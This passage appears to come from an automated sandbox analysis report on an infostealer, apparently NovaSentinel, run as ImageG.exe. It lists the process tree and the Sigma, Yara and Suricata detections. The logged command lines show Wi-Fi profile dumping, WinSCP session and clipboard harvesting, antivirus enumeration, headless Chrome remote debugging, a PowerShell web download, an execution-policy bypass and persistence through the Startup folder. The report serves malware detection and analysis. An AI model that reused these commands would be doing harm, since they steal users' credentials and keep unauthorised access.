        • conhost.exe (PID: 9592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9840 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Microsoft Edge" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 10120 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 10108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8308 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8492 cmdline: C:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8408 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • findstr.exe (PID: 2640 cmdline: findstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log" MD5: 804A6AE28E88689E0CF1946A6CB3FEE5)
      • cmd.exe (PID: 9248 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 2452 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 91.0.1 (x64 en-GB)" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8380 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8536 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8884 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 4452 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 2220 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 8048 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 3588 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 5236 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6798C408-2636-448C-8AC6-F4E341102D27}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 8224 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 1848 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7B981965-2FBC-433C-B4B3-E183EE97CD29}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 6240 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 6500 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 1144 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9400 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 4376 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 9884 cmdline: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{B652B695-C849-4EF2-B09A-72771C7AD2BA}" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • cmd.exe (PID: 10036 cmdline: C:\Windows\system32\cmd.exe /d /s /c "mullvad account get" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 10056 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 10028 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist /FO CSV /NH" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • tasklist.exe (PID: 9292 cmdline: tasklist /FO CSV /NH MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 1916 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 9644 cmdline: powershell -Command "Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntiVirusProduct | Format-List displayName, instanceGuid, pathToSignedProductExe, pathToSignedReportingExe, productState, timestamp" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 9484 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9584 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 7288 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 9640 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 9568 cmdline: powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\RpfMwk5hAFqJ_tezmp.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 9816 cmdline: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • netsh.exe (PID: 5452 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 9916 cmdline: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • reg.exe (PID: 10224 cmdline: C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions" MD5: 227F63E1D9008B36BDBCC4B397780BE4)
      • taskkill.exe (PID: 9004 cmdline: taskkill /PID 9048 /F MD5: A599D3B2FAFBDE4C1A6D7D0F839451C7)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • chrome.exe (PID: 9992 cmdline: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400 MD5: BB7C48CDDDE076E7EB44022520F40F77)
        • chrome.exe (PID: 10108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2232,i,12830479303068342978,11409588197743530798,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2248 /prefetch:3 MD5: BB7C48CDDDE076E7EB44022520F40F77)
      • Conhost.exe (PID: 9916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_NovaSentinelYara detected NovaSentinelJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    Process Memory Space: cmd.exe PID: 4416JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_5600.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

        Sigma Signatures

        System Summary

        barindex
        Sigma detected: PowerShell DownloadFile
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ProcessId: 4416, ProcessName: cmd.exe
        Sigma detected: Script Interpreter Execution From Suspicious Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\error_script.ps1"", ProcessId: 9048, ProcessName: cmd.exe
        Sigma detected: Suspicious Script Execution From Temp Folder
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4416, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", ProcessId: 5600, ProcessName: powershell.exe
        Sigma detected: Browser Started with Remote Debugging
        Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400, CommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400, CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --window-position=-2400,-2400, ProcessId: 9992, ProcessName: chrome.exe
        Sigma detected: Change PowerShell Policies to an Insecure Level
        Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -, ProcessId: 7312, ProcessName: powershell.exe
        Sigma detected: Console CodePage Lookup Via CHCP
        Source: Process startedAuthor: _pete_0, TheDFIRReport: Data: Command: chcp, CommandLine: chcp, CommandLine|base64offset|contains: r), Image: C:\Windows\System32\chcp.com, NewProcessName: C:\Windows\System32\chcp.com, OriginalFileName: C:\Windows\System32\chcp.com, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "chcp", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 480, ParentProcessName: cmd.exe, ProcessCommandLine: chcp, ProcessId: 4988, ProcessName: chcp.com
        Sigma detected: Enumeration for 3rd Party Creds From CLI
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"", ProcessId: 9916, ProcessName: cmd.exe
        Sigma detected: PowerShell Download Pattern
        Source: Process startedAuthor: Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro: Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4416, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", ProcessId: 5600, ProcessName: powershell.exe
        Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
        Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell Get-Clipboard", ProcessId: 9484, ProcessName: cmd.exe
        Sigma detected: PowerShell Web Download
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ProcessId: 4416, ProcessName: cmd.exe
        Sigma detected: Startup Folder File Write
        Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ProcessId: 5920, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ImageG.exe
        Sigma detected: Usage Of Web Request Commands And Cmdlets
        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ProcessId: 4416, ProcessName: cmd.exe
        Sigma detected: Non Interactive PowerShell Process Spawned
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')"", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4416, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://i.imgflip.com/472b3c.jpg', 'C:\Users\user\AppData\Local\Temp\error.jpg')", ProcessId: 5600, ProcessName: powershell.exe
        Sigma detected: Suspicious Query of MachineGUID
        Source: Process startedAuthor: frack113: Data: Command: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid, CommandLine: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid, CommandLine|base64offset|contains: AA, Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 4324, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid, ProcessId: 2608, ProcessName: reg.exe

        Stealing of Sensitive Information

        barindex
        Sigma detected: Capture Wi-Fi password
        Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentImage: C:\Users\user\AppData\Local\Temp\2uMC3LAGTB9VWbjFVr15MhCzTwv\ImageG.exe, ParentProcessId: 5920, ParentProcessName: ImageG.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "netsh wlan show profile", ProcessId: 9816, ProcessName: cmd.exe

        Suricata Signatures

        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-15T20:26:43.087459+010020298461A Network Trojan was detected192.168.11.206101894.139.32.29443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
